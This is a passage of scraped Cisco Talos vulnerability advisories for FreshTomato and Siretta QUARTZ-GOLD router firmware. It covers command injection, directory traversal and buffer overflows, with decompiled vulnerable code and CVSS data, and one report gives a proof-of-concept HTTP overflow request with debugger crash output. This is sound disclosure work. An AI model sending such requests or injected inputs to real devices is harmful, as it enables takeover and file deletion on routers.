Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1608\n\nPrevious Report\n\nTALOS-2022-1607\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd downfile.cgi directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38088"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1609", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1641\n\n## FreshTomato httpd logs/view.cgi OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-42484\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the httpd logs/view.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nFreshTomato 2022.5 \nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020 \nAdvancedTomato commit 67273b0\n\n##### PRODUCT URLS\n\nFreshTomato - <https://www.freshtomato.org/> QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nFreshTomato is an open source firmware based on linux. The firmware offers several features for Broadcom-based routers.\n\nThe FreshTomato\u2019s httpd component offers several APIs. One is called `logs/view.cgi` and is used to query/view the log files.\n\nOne of the functions responsible for performing this API is `wo_viewlog`:\n \n \n void wo_viewlog(char *url)\n {\n char *p;\n char *c;\n char s[128];\n char t[128];\n int n;\n char lfn[256];\n \n if (!logok())\n return;\n \n get_logfilename(lfn);\n if ((p = webcgi_get(\"find\")) != NULL) { [1]\n send_header(200, NULL, mime_plain, 0);\n if (strlen(p) > 64)\n return;\n \n c = t;\n while (*p) {\n switch (*p) {\n case '<':\n case '>':\n case '|':\n case '\"':\n case '\\\\':\n *c++ = '\\\\';\n *c++ = *p;\n break;\n default:\n if (isprint(*p))\n *c++ = *p;\n break;\n }\n ++p;\n }\n *c = 0;\n snprintf(s, sizeof(s), \"grep -ih \\\"%s\\\" $(ls -1rv %s %s.*)\", t, lfn, lfn); [2]\n web_pipecmd(s, WOF_NONE); [3]\n return;\n }\n \n if ((p = webcgi_get(\"which\")) == NULL)\n return;\n \n if (strcmp(p, \"all\") == 0)\n n = MAX_LOG_LINES;\n else if ((n = atoi(p)) <= 0)\n return;\n \n send_header(200, NULL, mime_plain, 0);\n snprintf(s, sizeof(s), \"cat $(ls -1rv %s %s.*) | tail -n %d\", lfn, lfn, n);\n web_pipecmd(s, WOF_NONE);\n }\n \n\nThis function will fetch, at `[1]`, the `find` parameter. If it exists, eventually, the instruction at `[2]` will be executed. This instruction will compose the string `grep -ih \\\"<parsed find parameter>\\\" $(ls -1rv <logfilename> <logfilename>.*)`, which will be used at `[3]` for the `web_pipecmd` function that will call the `popen` function and print out the results.\n\nBecause no real sanitization is performed against the `find` parameter, this function is vulnerable to a command injection vulnerability and can lead to arbitrary command execution.\n\n##### TIMELINE\n\n2022-10-19 - Vendor Disclosure\n\n2022-11-08 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1642\n\nPrevious Report\n\nTALOS-2022-1617\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "FreshTomato httpd logs/view.cgi OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42484"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1641", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1637\n\n## Siretta QUARTZ-GOLD m2m DELETE_FILE cmd directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-41154\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary file deletion. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n8.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many other\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.\n\nFollowing the portion of `m2m` binary that manages the `DELETE_FILE` command:\n \n \n [...]\n cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;\n if (cmdid_provided == 0x15) {\n syslog(5,\"M2M Command(%02x) DELETE_FILE!!!\",0x15);\n m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;\n m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;\n [... set base_folder variable ...]\n base_folder_length = strlen(base_folder);\n for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);\n current_entry_off = current_entry_off + __bswap_16(previous_data_len)){\n current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));\n if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||\n (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||\n (command_string = calloc(current_data_len + base_folder_length + 0xc,1),\n command_string == 0x0)) { [1]\n [... invalid state ...]\n }\n sprintf(command_string,\"rm -rf %s/%s &\",base_folder,&UDP_data_buff.entries[0].data + current_entry_off\n ); [2]\n syslog(6,\"Deleting file :%s\",command_string + 7);\n system(command_string);\n free(command_string);\n previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off); [3]\n [...]\n \n\nFollowing, we will briefly explain the packet composition for this command:\n \n \n struct M2M_data_entry{\n uint16_t fix_word;\n uint16_t data_len;\n char data[];\n };\n \n struct M2M_packet{\n uint16_t packet_len;\n uint16_t cmd_id;\n uint32_t pkd_id;\n uint16_t version;\n M2M_data_entry entries[];\n };\n \n\nThe UDP packet received, which can contain at most 0x251c bytes, is cast to an `M2M_packet`. This is a variable length structure. Indeed, inside of it there is an array of `M2M_data_entry` structure that is a variable length struct. To seek the various entries, the variable `current_entry_off` is used. It starts with value 0 and then, at `[3]`, the value `M2M_data_entry.data_len` of the just-parsed entry is added to seek, in the next loop, the next entry.\n\nThe `DELETE_FILE` command will execute the command `rm -rf <base_folder>/<M2M_data_entry.data> &` for each entry in the UDP `M2M_packet` packet it received.\n\nAt `[2]` the `rm -rf <base_folder>/<M2M_data_entry.data> &` string is composed and executed. At `[1]` some checks are performed, but none about the content of the `M2M_data_entry.data`. Because any value of `M2M_data_entry.data` is allowed, this function is vulnerable to a directory path traversal vulnerability. This leads to arbitrary file deletion.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1640\n\nPrevious Report\n\nTALOS-2022-1638\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD m2m DELETE_FILE cmd directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41154"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1637", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1605\n\n## Siretta QUARTZ-GOLD httpd delfile.cgi stack-based buffer overflow vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-36279\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has an web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to delete a previously uploaded file:\n \n \n void delfile.cgi(void)\n \n {\n [...]\n \n [... calculate the value of the base_folder variable ...]\n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename_ = \"\";\n if (_filename_param != (char *)0x0) {\n filename_ = _filename_param;\n }\n if (*filename_ != '\\0') {\n sprintf(command_buff,\"rm -rf %s/%s\",base_folder,filename_); [2]\n system(command_buff);\n }\n [...]\n }\n \n\nThe `delfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be deleted. At `[1]` the uploaded parameter is taken and used at `[2]`. The function used at `[2]` is a `sprintf`, which does not take into consideration the size of the buffer. If the file name, provided through the `_filename` parameter, is longer than a certain length, the instruction at `[2]` would cause a stack-based buffer overflow that could lead to remote code execution.\n\n### Crash Information\n \n \n $r0 : 0x1 \n $r1 : 0x1 \n $r2 : 0x0 \n $r3 : 0x0 \n $r4 : 0x61616266 (\"fbaa\"?)\n $r5 : 0x61616366 (\"fcaa\"?)\n $r6 : 0x243 \n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e66e \u2192 \"delfile.cgi\"\n $r10 : 0x0001dbdc \u2192 0x0001e66e \u2192 \"delfile.cgi\"\n $r11 : 0x7ea5b784 \u2192 \"admin\"\n $r12 : 0x2ae4773c \u2192 0x2ae33ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ea59070 \u2192 \"feaaffaafgaafhaafiaafjaaf\"\n $lr : 0x2ae2db30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x61616464 (\"ddaa\"?)\n $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ea59070\u2502+0x0000: \"feaaffaafgaafhaafiaafjaaf\" \u2190 $sp\n 0x7ea59074\u2502+0x0004: \"ffaafgaafhaafiaafjaaf\"\n 0x7ea59078\u2502+0x0008: \"fgaafhaafiaafjaaf\"\n 0x7ea5907c\u2502+0x000c: \"fhaafiaafjaaf\"\n 0x7ea59080\u2502+0x0010: \"fiaafjaaf\"\n 0x7ea59084\u2502+0x0014: \"fjaaf\"\n 0x7ea59088\u2502+0x0018: 0x312f0066 (\"f\"?)\n 0x7ea5908c\u2502+0x001c: \".1\\r\\n\"\n \u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x61616464\n \u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0x61616464 in ?? (), reason: SIGSEGV\n \n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /delfile.cgi HTTP/1.1\n Host: 192.168.0.1\n Authorization: Basic <a valid basic auth value>\n Connection: close\n Content-Length: 579\n \n _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaaf&_http_id=<the correct tid>\n \n\nThe status at the return address of the `delfile.cgi` function would be:\n \n \n $r0 : 0x1 \n $r1 : 0x1 \n $r2 : 0x0 \n $r3 : 0x0 \n $r4 : 0x00019369 \u2192 0x6e6f4300\n $r5 : 0x0002272b \u2192 \"/jffs\"\n $r6 : 0x243 \n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e66e \u2192 \"delfile.cgi\"\n $r10 : 0x0001dbdc \u2192 0x0001e66e \u2192 \"delfile.cgi\"\n $r11 : 0x7ea5b784 \u2192 \"admin\"\n $r12 : 0x2ae4773c \u2192 0x2ae33ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ea59064 \u2192 \"fbaafcaafdaafeaaffaafgaafhaafiaafjaaf\"\n $lr : 0x2ae2db30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x0000fa48 \u2192 pop {r4, r5, pc}\n $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ea59064\u2502+0x0000: \"fbaafcaafdaafeaaffaafgaafhaafiaafjaaf\" \u2190 $sp\n 0x7ea59068\u2502+0x0004: \"fcaafdaafeaaffaafgaafhaafiaafjaaf\"\n 0x7ea5906c\u2502+0x0008: \"fdaafeaaffaafgaafhaafiaafjaaf\"\n 0x7ea59070\u2502+0x000c: \"feaaffaafgaafhaafiaafjaaf\"\n 0x7ea59074\u2502+0x0010: \"ffaafgaafhaafiaafjaaf\"\n 0x7ea59078\u2502+0x0014: \"fgaafhaafiaafjaaf\"\n 0x7ea5907c\u2502+0x0018: \"fhaafiaafjaaf\"\n 0x7ea59080\u2502+0x001c: \"fiaafjaaf\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n 0xfa3c mov r0, r4\n 0xfa40 bl 0xbae4\n 0xfa44 add sp, sp, #516 ; 0x204\n \u2192 0xfa48 pop {r4, r5, pc}\n [!] Cannot disassemble from $PC\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0xfa48 in ?? (), reason: BREAKPOINT\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n [#0] 0xfa48 \u2192 pop {r4, r5, pc}\n [#1] 0x2ae2db30 \u2192 free()\n \n\nSo the next instruction will populate the `pc` with the third dword contained in the stack, so:\n \n \n gef\u27a4 hexdump dword $sp\n 0x7ea59064\u2502+0x0000 0x61616266 \n 0x7ea59068\u2502+0x0004 0x61616366 \n 0x7ea5906c\u2502+0x0008 0x61616466 \n \n\nAfter the pop the `pc` will contain the `0x61616466` value.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1606\n\nPrevious Report\n\nTALOS-2022-1642\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd delfile.cgi stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36279"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1605", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1639\n\n## Siretta QUARTZ-GOLD m2m DELETE_FILE cmd heap-based buffer overflow vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-41991\n\n##### SUMMARY\n\nA heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-122 - Heap-based Buffer Overflow\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.\n\nFollowing is the portion of `m2m` binary that manages the `DELETE_FILE` command:\n \n \n [...]\n cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;\n if (cmdid_provided == 0x15) {\n syslog(5,\"M2M Command(%02x) DELETE_FILE!!!\",0x15);\n m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;\n m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;\n [... set base_folder variable ...]\n base_folder_length = strlen(base_folder);\n for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);\n current_entry_off = current_entry_off + __bswap_16(previous_data_len)){\n current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));\n if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||\n (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||\n (command_string = calloc(current_data_len + base_folder_length + 0xc,1),\n command_string == 0x0)) { [1]\n [... invalid state ...]\n }\n sprintf(command_string,\"rm -rf %s/%s &\",base_folder,&UDP_data_buff.entries[0].data + current_entry_off\n ); [2]\n syslog(6,\"Deleting file :%s\",command_string + 7);\n system(command_string);\n free(command_string);\n previous_data_len = *(UDP_data_buff.entries[0].data_len + 